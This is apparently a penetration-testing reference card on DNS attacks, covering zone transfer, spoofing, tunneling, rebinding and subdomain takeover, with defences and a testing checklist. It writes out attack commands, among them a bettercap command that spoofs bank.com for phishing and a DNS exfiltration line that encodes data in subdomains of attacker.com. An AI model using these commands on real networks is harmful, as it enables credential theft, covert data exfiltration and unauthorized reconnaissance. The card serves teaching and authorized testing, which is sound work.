DNS Attacks
DNS is the Internet’s phone book, and since all traffic starts by resolving a name, manipulating it has huge impact: you can redirect victims to fake servers, intercept traffic, exfiltrate data over a covert channel, or enumerate an organization’s whole infrastructure. This card covers attacks on DNS, from recon to active manipulation (the protocol fundamentals are in DNS Fundamentals).
Attack landscape
Section titled “Attack landscape”- Zone transfer (AXFR): if misconfigured, hands you the whole zone.
- DNS spoofing/cache poisoning: answer with fake IPs to redirect victims.
- DNS exfiltration/tunneling: extract data encoded in DNS queries (covert channel).
- Subdomain takeover: claim a subdomain with a dangling CNAME (see Subdomain takeover).
- DNS rebinding: bypass the Same-Origin Policy toward internal services.
- Insecure dynamic DNS: update records without authentication.
Zone transfer (recon)
Section titled “Zone transfer (recon)”# find the NS and request the full zonedig NS target.comdig axfr @ns1.target.com target.com# if it works: all records (subdomains, internal IPs, mail, etc.)An open AXFR is a classic finding: it hands over the domain’s full map.
DNS spoofing / cache poisoning
Section titled “DNS spoofing / cache poisoning”Answer DNS queries faster than the legitimate server (in a MITM) or poison a resolver’s cache:
# in a MITM (see net-mitm): answer the victim's query with your IPbettercap -> set dns.spoof.domains bank.com ; dns.spoof on# the victim resolves bank.com -> your server (phishing/capture)Classically also via flaws in resolver randomness (Kaminsky, 2008) — today mitigated with source port randomization and DNSSEC.
DNS tunneling / exfiltration
Section titled “DNS tunneling / exfiltration”DNS is usually allowed outbound even on restricted networks, so it serves as a covert channel:
# encode data in subdomains -> the attacker's authoritative server receives themdata.encoded.in.base32.attacker.com# toolsiodine / dnscat2 / dns2tcp -> full tunnel (C2, exfiltration) over DNSUseful to exfiltrate data or maintain C2 when other ports are blocked.
DNS rebinding
Section titled “DNS rebinding”An attacker domain first resolves to their IP (to load the JS) and then to an internal IP of the victim, bypassing the Same-Origin Policy to attack internal services (routers, local APIs) from the victim’s browser.
For the defense
Section titled “For the defense”- Restrict zone transfers to authorized secondaries (ACL on the DNS).
- DNSSEC (record signing) against spoofing/poisoning; source port randomization.
- Monitor anomalous DNS queries: high volume to one domain, long/random subdomains (tunneling), unusual TXT.
- Filter/inspect outbound DNS (DNS firewall, block external resolvers, Protective DNS).
- Against rebinding: validate
Host/Originon internal services, block DNS answers pointing to private IPs from external resolvers. - Clean up stale records (prevents subdomain takeover — see Subdomain takeover).
Testing checklist
Section titled “Testing checklist”- Zone transfer (AXFR) on the domain’s NS
- DNS spoofing in a MITM (redirect to a controlled host)
- DNS tunneling feasibility (is outbound DNS allowed?)
- Subdomain takeover (dangling CNAMEs — Subdomain takeover)
- DNS rebinding toward internal services
- Is DNSSEC present? Resolver randomness?
- Stale records that enable takeover
- Blue: monitoring of anomalous queries